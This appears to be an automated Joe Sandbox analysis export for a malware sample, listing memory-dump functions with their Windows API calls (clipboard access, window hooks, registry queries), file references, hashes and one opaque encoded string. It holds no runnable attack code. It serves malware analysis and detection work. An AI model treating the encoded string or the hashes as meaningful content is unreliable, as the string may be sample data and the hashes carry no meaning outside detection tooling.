Opcode Fuzzy Hash: 01501d81daa996d41b6568f2c8f10dc48395ee40d0c264b7b1cfc1d8f6685a3f
Instruction Fuzzy Hash: CF319D7070532ACFCB18AB24C85436D7AF2FF84605F1484A9D40AAB394DF35DE85CB81

Function 06E7E064 Relevance: 1.6, APIs: 1, Instructions: 91registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06E7E129

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 29e5b751b4d7331b63b235be15be8b2879971ef45be31cfba5036b4f343c4226
Instruction ID: c1b5005ec595b0a1c3bb0e57ace051ce37f56fb4ff9a157fc1938e0dde4e7e23
Opcode Fuzzy Hash: 29e5b751b4d7331b63b235be15be8b2879971ef45be31cfba5036b4f343c4226
Instruction Fuzzy Hash: A531FDB1D003589FCB24CF9AC985ACEBFF5AF48314F14806AE819AB310DB719945CFA1

Function 06E7F51C Relevance: 1.6, APIs: 1, Instructions: 90comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 06E7F5B0

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 97d784bbee7c683338b23d6376b5f26d22862647ce159827072472f850cda285
Instruction ID: 482b61691b4969a6796491578581d748b19decc9c04b3164dec54c42d3888f9c
Opcode Fuzzy Hash: 97d784bbee7c683338b23d6376b5f26d22862647ce159827072472f850cda285
Instruction Fuzzy Hash: FF3134B1E01308DFDB14CF98D984BDEBBF5EB48318F248069E409AB290D7719945CFA5

Function 06E7BB80 Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 06E7E129

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: e6e92dc72cf31bbe8fdd0d24eb68e0b034b943dbd39bae827c16020dd6d65305
Instruction ID: 48513a53a2686c2984aa46ccd2e3d1d3ae8bb5bd93843b893223e806e182ffcb
Opcode Fuzzy Hash: e6e92dc72cf31bbe8fdd0d24eb68e0b034b943dbd39bae827c16020dd6d65305
Instruction Fuzzy Hash: F331D1B1D003599FCB60CF9AC984A9EBBF5BF48314F14806AE819AB314DB719945CF91

Function 06E7DE2C Relevance: 1.6, APIs: 1, Instructions: 86registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 06E7DEEC

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 94f9c3a87047d6b3e3e389d34343e0c952c24cc5f61d5a3a0dc37508d9993bff
Instruction ID: 07e16451023f3f30258e14aeba4567ffb158a30b2aa640065f36b6f7d6b7a95b
Opcode Fuzzy Hash: 94f9c3a87047d6b3e3e389d34343e0c952c24cc5f61d5a3a0dc37508d9993bff
Instruction Fuzzy Hash: 6331ECB0D013499FDB14CFA9C584A8EFFF5BF48304F28816AE809AB255C7759984CFA4

Function 06E7BB74 Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 06E7DEEC

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: cecdc6ff0a62f27530683b0b68fbfcc1d7f8304deafc76f5be9c993910a0cd22
Instruction ID: c631ff6db760e6bbfa8c7a511e45dca3f43b8f83edf4501ee6ef8b6ede558595
Opcode Fuzzy Hash: cecdc6ff0a62f27530683b0b68fbfcc1d7f8304deafc76f5be9c993910a0cd22
Instruction Fuzzy Hash: EE31ECB0D013498FDB14CF99C588A8EFFF5AF48308F28816AE809AB355D7759884CB94

Function 06E7EF38 Relevance: 1.6, APIs: 1, Instructions: 74comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 06E7F5B0

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 47ed53029bd0eba7764955d112b7815f16e59c37ad98c0a9e8d70b5e71ea3804
Instruction ID: f6b7ad721a6208cb47540479ca2d686a06dc23d5cc9318c6054610e5aa0e4469
Opcode Fuzzy Hash: 47ed53029bd0eba7764955d112b7815f16e59c37ad98c0a9e8d70b5e71ea3804
Instruction Fuzzy Hash: 0F3102B0D01348DFDB50CF99D984BCEBBF5AB48308F248059E405BB2A4D775A985CFA5

Function 013BC598 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 013BD3B6

Memory Dump Source

Source File: 00000000.00000002.4113187401.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_ZOYGRL1ePa.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 0a872a0d74a100ae73b73b1b03678e9f25fd7b102249820c7fb494dc763659c8
Instruction ID: 5983e61b1f63d0a041ec299b30e69821ab9ab4b4fb0964f76b9df2ca7308a3e3
Opcode Fuzzy Hash: 0a872a0d74a100ae73b73b1b03678e9f25fd7b102249820c7fb494dc763659c8
Instruction Fuzzy Hash: 1621BCB1805388CFDB11DF9EC8847DEBFF4AF49228F05806AC558AB652D3389544CFA5

Function 06E7EBA0 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,06E7EB97), ref: 06E7EC27

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 02d3a7e40875028c8e14ae0e1ab982c7d26bcbab6145530fa87699b9fa76a5ee
Instruction ID: 720ed6dd8bfc0e299f59a548af9c272f13cf4a6fcb4af95619caf62ca9480ec2
Opcode Fuzzy Hash: 02d3a7e40875028c8e14ae0e1ab982c7d26bcbab6145530fa87699b9fa76a5ee
Instruction Fuzzy Hash: 4C1189B59043888FCB20DFA9D444BDEBFF4AB49314F24849AD454A7251C274A944CFA6

Function 06FC0770 Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 06FC07F3

Memory Dump Source

Source File: 00000000.00000002.4122967280.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc0000_ZOYGRL1ePa.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: e04c6bfcb4e650c80dcf7ca4d507c30c31f826eca388ace6dda09cc953230d6c
Instruction ID: 95370335932793047048a5eaa2ae186c1b478e67b2ca556c9383592979e7999a
Opcode Fuzzy Hash: e04c6bfcb4e650c80dcf7ca4d507c30c31f826eca388ace6dda09cc953230d6c
Instruction Fuzzy Hash: 2E2123B5D00209DFCB14CF99C944BDEBBF5AF88324F208429E458A7250CB75A945CFA5

Function 06FCE79A Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000,?,?,?,?,?,06FCE2A9,?,00000000), ref: 06FCE80A

Memory Dump Source

Source File: 00000000.00000002.4122967280.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc0000_ZOYGRL1ePa.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 79eb1cc886f8e81e0632e7032f933fb0ec66534dab71171d5c9a06e5f1d00edb
Instruction ID: c619329ec4e850f563f39150f386675978ea08cf96d605daf0a98cdf0abafaa6
Opcode Fuzzy Hash: 79eb1cc886f8e81e0632e7032f933fb0ec66534dab71171d5c9a06e5f1d00edb
Instruction Fuzzy Hash: 6C2106B6D002498FDB10CF9AC544ADEFBF4EB88320F14842AD858A7651D738A545CFA5

Function 06FC0778 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 06FC07F3

Memory Dump Source

Source File: 00000000.00000002.4122967280.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc0000_ZOYGRL1ePa.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 80a3574b49c16a8bdf7124b63ea54e2e56ac3a44cf5b29d241288eb9be8f230a
Instruction ID: 6c874be70edbcb3bf2d8e37d865e5e3ddcd612b3477e714322a2a9d076c8f6cb
Opcode Fuzzy Hash: 80a3574b49c16a8bdf7124b63ea54e2e56ac3a44cf5b29d241288eb9be8f230a
Instruction Fuzzy Hash: 342115B5D00209DFCB14CF99C944BDEFBF5AB88324F108429D459A7250CB75A945CFA5

Function 06FCBF99 Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 06FCC008

Memory Dump Source

Source File: 00000000.00000002.4122967280.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc0000_ZOYGRL1ePa.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 2b130be605ef38878dc0ebbac12b4bde388f91b51739324b7aad9b7e76174bee
Instruction ID: cca59755df97dfdddf488a719832d8a5caacdc59ed424adcb1380bb433fdbdd2
Opcode Fuzzy Hash: 2b130be605ef38878dc0ebbac12b4bde388f91b51739324b7aad9b7e76174bee
Instruction Fuzzy Hash: 8A11F9B5C00249DFDB10DF9AD944BDEFBF8EB48324F10842AE558A3251C375A544DFA5

Function 06FCA7C4 Relevance: 1.6, APIs: 1, Instructions: 56COMMON

Download Yara Rule

APIs

SetWindowTextW.USER32(?,00000000,?,?,?,?,?,06FCE2A9,?,00000000), ref: 06FCE80A

Memory Dump Source

Source File: 00000000.00000002.4122967280.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc0000_ZOYGRL1ePa.jbxd

Similarity

API ID: TextWindow
String ID:
API String ID: 530164218-0
Opcode ID: 2fbba8896cb15b8139d466e7c280f9d2f92400e6c16f98cca377b622d103090e
Instruction ID: 896403295d26727bc5203bdeccf29a3e686729d9080247c65bb00f48d1ca14b0
Opcode Fuzzy Hash: 2fbba8896cb15b8139d466e7c280f9d2f92400e6c16f98cca377b622d103090e
Instruction Fuzzy Hash: D02103B6D002498FDB10CF9AC544BDEFBF4EB88320F14842EE868A7251D779A545CFA5

Function 06E7AED3 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 06E7AF1F

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1dd4815b78d09945d0a3a002bbeb5a09b4fa0b87fbace2ad98420acce7fc5777
Instruction ID: cdf00ede84a27c8b40fd24fd4a18a7d96e389834cc50ece78be8b4dec30b4149
Opcode Fuzzy Hash: 1dd4815b78d09945d0a3a002bbeb5a09b4fa0b87fbace2ad98420acce7fc5777
Instruction Fuzzy Hash: 2C213D30E00309DFCB18EF69D984A9EBBB2FF84304F108529E401AB355DB35A845CF94

Function 06FCBFA0 Relevance: 1.6, APIs: 1, Instructions: 52windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,?,?,?,?), ref: 06FCC008

Memory Dump Source

Source File: 00000000.00000002.4122967280.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc0000_ZOYGRL1ePa.jbxd

Similarity

API ID: MessagePeek
String ID:
API String ID: 2222842502-0
Opcode ID: 7354bc069791e70f6dd5e5010e059ac951dbab9c5e05b96bbdc3d62ba7658cc9
Instruction ID: 8af5c2e6a9711fa36939451634d1c54633dde743805808efa62bd8962e045f54
Opcode Fuzzy Hash: 7354bc069791e70f6dd5e5010e059ac951dbab9c5e05b96bbdc3d62ba7658cc9
Instruction Fuzzy Hash: 2511D4B5C00249DFDB10CF9AD984BDEFBF8EB48324F10842AE958A7251C379A544DFA5

Function 06FCC66C Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(01324708,0000040A,?,?), ref: 06FCF198

Memory Dump Source

Source File: 00000000.00000002.4122967280.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc0000_ZOYGRL1ePa.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 1bc263cb4dde5a8a808e56fcc7f13b92257c68c248b7148f68dd58bdfb656071
Instruction ID: 1eca19d78886f8d9730ce98cb9b51f14ea99151c48ad7297111ac5f64bd88463
Opcode Fuzzy Hash: 1bc263cb4dde5a8a808e56fcc7f13b92257c68c248b7148f68dd58bdfb656071
Instruction Fuzzy Hash: 1B1113B59002499FCB20DF9AC984BDEFBF4EB48324F208419E558A7250C375A944CFA5

Function 06FCF128 Relevance: 1.6, APIs: 1, Instructions: 50windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(01324708,0000040A,?,?), ref: 06FCF198

Memory Dump Source

Source File: 00000000.00000002.4122967280.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc0000_ZOYGRL1ePa.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bbb6d91e1b991a701d1f606cd54c80a3e7cc66b40166ed56b71ee975236cbe09
Instruction ID: 7831bc63562c8e1e7041ebf4bbcaf3b899b87d7cb7ffb24aa3fc90cb336fd7a6
Opcode Fuzzy Hash: bbb6d91e1b991a701d1f606cd54c80a3e7cc66b40166ed56b71ee975236cbe09
Instruction Fuzzy Hash: 601143B5800249CFCB20DF9AC884BDFBFF4EB88324F208419E458A7250C335A544CFA4

Function 013BC564 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 013BD3B6

Memory Dump Source

Source File: 00000000.00000002.4113187401.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_ZOYGRL1ePa.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 423b02c7cd560db01716b5f17ceaf5001c9a01263ede1dc76e2d14ba05749824
Instruction ID: aee9baee66d557119a9a625667a2073b0d88698c34f68d0d2de04b2f0c197f23
Opcode Fuzzy Hash: 423b02c7cd560db01716b5f17ceaf5001c9a01263ede1dc76e2d14ba05749824
Instruction Fuzzy Hash: 811132B5C003098FCB10DF9AC484ADEFBF4EB88318F14842AD619B7611D375A545CFA5

Function 06E7BC14 Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,06E7EB97), ref: 06E7EC27

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 50a8935502b423c7a58a5fc5d3cfdbd0a9ffe644859be959f26ae499f15510ac
Instruction ID: 932cc6b7c22caf179b85d6bc59db38f24ef5d557fa16d4cfb4f56fe87b6d8738
Opcode Fuzzy Hash: 50a8935502b423c7a58a5fc5d3cfdbd0a9ffe644859be959f26ae499f15510ac
Instruction Fuzzy Hash: 7C1110B59003488FCB20DF9AD445BDEFFF8EB88324F20846AD519A7250C775A940CFA5

Function 06FCCB49 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 06FCCBAD

Memory Dump Source

Source File: 00000000.00000002.4122967280.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc0000_ZOYGRL1ePa.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: d548f8f6aee0e2ed6052e26417ac3078b826c9e664dc9c7a1d39e30aecbe3d63
Instruction ID: 072ab15266b18d799a9be4d1cd20b345e965631c6649de7302f68b36df3f2f59
Opcode Fuzzy Hash: d548f8f6aee0e2ed6052e26417ac3078b826c9e664dc9c7a1d39e30aecbe3d63
Instruction Fuzzy Hash: 4F1125B5C002499FCB10DF9AE944BCEFBF4EB48324F10846AD558A3210D379A544CFA5

Function 0760C917 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0760C975

Memory Dump Source

Source File: 00000000.00000002.4124830919.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7600000_ZOYGRL1ePa.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 9b3dc6581f1c089aedd553e5e8c7cc8e41d34c19a45104a8ef6b6772b7a44588
Instruction ID: 6fe7c5fc3caddbd7d2de2e658e5762984bf82f8babd6c6f63d95b0f551a4cdd4
Opcode Fuzzy Hash: 9b3dc6581f1c089aedd553e5e8c7cc8e41d34c19a45104a8ef6b6772b7a44588
Instruction Fuzzy Hash: 9F1136B5800349DFDB10CF9AC845BEEFBF8EB48324F10841AE554A3650D378A984CFA5

Function 013BD348 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 013BD3B6

Memory Dump Source

Source File: 00000000.00000002.4113187401.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13b0000_ZOYGRL1ePa.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: f027f2ddafd215f61a68d7f37bb6a1fd695ce783a15760ecbecefa8a9847e066
Instruction ID: 4c00f729a015a61ae993cb9b229975e8a34b9a67586d4d503d6971248566fd4b
Opcode Fuzzy Hash: f027f2ddafd215f61a68d7f37bb6a1fd695ce783a15760ecbecefa8a9847e066
Instruction Fuzzy Hash: 541132B6D003098FCB10CF9AC444BDEFBF4AF88218F14842AC959B7611D339A545CFA1

Function 0760C918 Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0760C975

Memory Dump Source

Source File: 00000000.00000002.4124830919.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7600000_ZOYGRL1ePa.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 178e09e9c388f9b89760c3b42fc0fc078529d56f2319b531e208cb2aebd57997
Instruction ID: 9c61733da6fd0f5914c50d5c7a855e0458195d7cbfacff2557882189bd8ed251
Opcode Fuzzy Hash: 178e09e9c388f9b89760c3b42fc0fc078529d56f2319b531e208cb2aebd57997
Instruction Fuzzy Hash: AB1106B5800349DFDB10CF9AC845BEEFBF8EB48324F148459E554A3251D379A984CFA5

Function 06E7EE20 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06E7F435

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 5f9c56e4425196f5971eb7f69685315c5cfac2378312fdda8da261f6e67615cb
Instruction ID: 0e7d754f7eca42da8cc0b2bf4f12b44dc410466bd887c12f31818d528465db36
Opcode Fuzzy Hash: 5f9c56e4425196f5971eb7f69685315c5cfac2378312fdda8da261f6e67615cb
Instruction Fuzzy Hash: E11100B19003488FCB20DF9AC589BDEBBF4EB48324F208459D558B7210D775A945CFA5

Function 06E7F3D8 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 06E7F435

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: f6e687bb25ed8289f01ef6b8970bdf7d3b0e3254d0bdaa8ac982fad694546205
Instruction ID: 76044d26024748009165f297b7ab356379e3b1ed788979323ec1eea69694ce4e
Opcode Fuzzy Hash: f6e687bb25ed8289f01ef6b8970bdf7d3b0e3254d0bdaa8ac982fad694546205
Instruction Fuzzy Hash: 481112B18003488FCB20DFAAC549BDEFBF8EF48324F20845AD558A7250D375A585CFA5

Function 0760C877 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0760C8D5

Memory Dump Source

Source File: 00000000.00000002.4124830919.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7600000_ZOYGRL1ePa.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: ef4b815847e2efd0763a60de022a10dbeb5bd270f0dce0fd677da30a18b5527a
Instruction ID: 2a547b731cd80255acc349c8be8fecf54c24be18856e2c9fa9af632f757c3676
Opcode Fuzzy Hash: ef4b815847e2efd0763a60de022a10dbeb5bd270f0dce0fd677da30a18b5527a
Instruction Fuzzy Hash: BE1103B58003499FCB10CF9AC485BDFBFF8EB48324F10841AE558A7650C375A584CFA5

Function 0760C878 Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 0760C8D5

Memory Dump Source

Source File: 00000000.00000002.4124830919.0000000007600000.00000040.00000800.00020000.00000000.sdmp, Offset: 07600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7600000_ZOYGRL1ePa.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8d563f7a3e88178029d565cf33eb2e1c2acf747b172fe5af9e54e8cc9a911a82
Instruction ID: 8c6e3ab765df8591a920f76cef0976dd6c8446afd10490c90b113a07abf85d20
Opcode Fuzzy Hash: 8d563f7a3e88178029d565cf33eb2e1c2acf747b172fe5af9e54e8cc9a911a82
Instruction Fuzzy Hash: 8711D0B58003499FDB10DF9AC885BDFBFF8EB48324F20845AE559A7250C375A984CFA5

Function 06FCCB50 Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON

Download Yara Rule

APIs

DispatchMessageW.USER32 ref: 06FCCBAD

Memory Dump Source

Source File: 00000000.00000002.4122967280.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc0000_ZOYGRL1ePa.jbxd

Similarity

API ID: DispatchMessage
String ID:
API String ID: 2061451462-0
Opcode ID: 9a90e522c149f626896ded444a485e2470b25960f6996c8416c208db424db3ff
Instruction ID: 7123589f3bd1c3ad3e178d1ab4be0ceea8e898872e64bb289d310c5759c2de67
Opcode Fuzzy Hash: 9a90e522c149f626896ded444a485e2470b25960f6996c8416c208db424db3ff
Instruction Fuzzy Hash: E411DDB5C006498FCB20DF9AD944BDEFBF4EB88324F10846AD568A7250D379A544CFA5

Function 06E7EC5C Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,?,?,06E7EB97), ref: 06E7EC27

Memory Dump Source

Source File: 00000000.00000002.4122505387.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e70000_ZOYGRL1ePa.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 78dcdbf5191876f16ec1468b3b3c941c70a88a2eb7b9eaa2aae4201d5ad366d9
Instruction ID: f98461fcc5332fb3192d4c0abcf298e270519fba02b638988498dc1ba0cd19c6
Opcode Fuzzy Hash: 78dcdbf5191876f16ec1468b3b3c941c70a88a2eb7b9eaa2aae4201d5ad366d9
Instruction Fuzzy Hash: 25F024B68083848ED761976984043C9BFE0DF91215F2985CAC09ACB661D2398045C751

Function 0132E2C8 Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO, xrefs: 0132E31C

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO
API String ID: 0-243281813
Opcode ID: 137a6f6021bdbd074c0f0f62bccb922a764ae0169082233d82795499d7a708a4
Instruction ID: a272928b4abf73a6411f40f8562eb05da6d2f047ca58335e8047c50a653ac476
Opcode Fuzzy Hash: 137a6f6021bdbd074c0f0f62bccb922a764ae0169082233d82795499d7a708a4
Instruction Fuzzy Hash: 422193755083C09FC707DB24D994712BF71EF46214F28C5EAD9898F6A7C33A984AC752

Function 0132E31C Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO, xrefs: 0132E060, 0132E31C

Memory Dump Source

Source File: 00000000.00000002.4112835630.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_132d000_ZOYGRL1ePa.jbxd

Similarity

API ID:
String ID: SW93rCJFbbLdWaPMCHB3qO49CadeC6trJnlspIfs3lmSYxFVff8Ae5xg7SQKha3nLzSiYebN/rGKD5uQ3TGOoFN+xNmZ/NzJOGErED5w3WuVUaytY7XicO001/wxJc3MoO
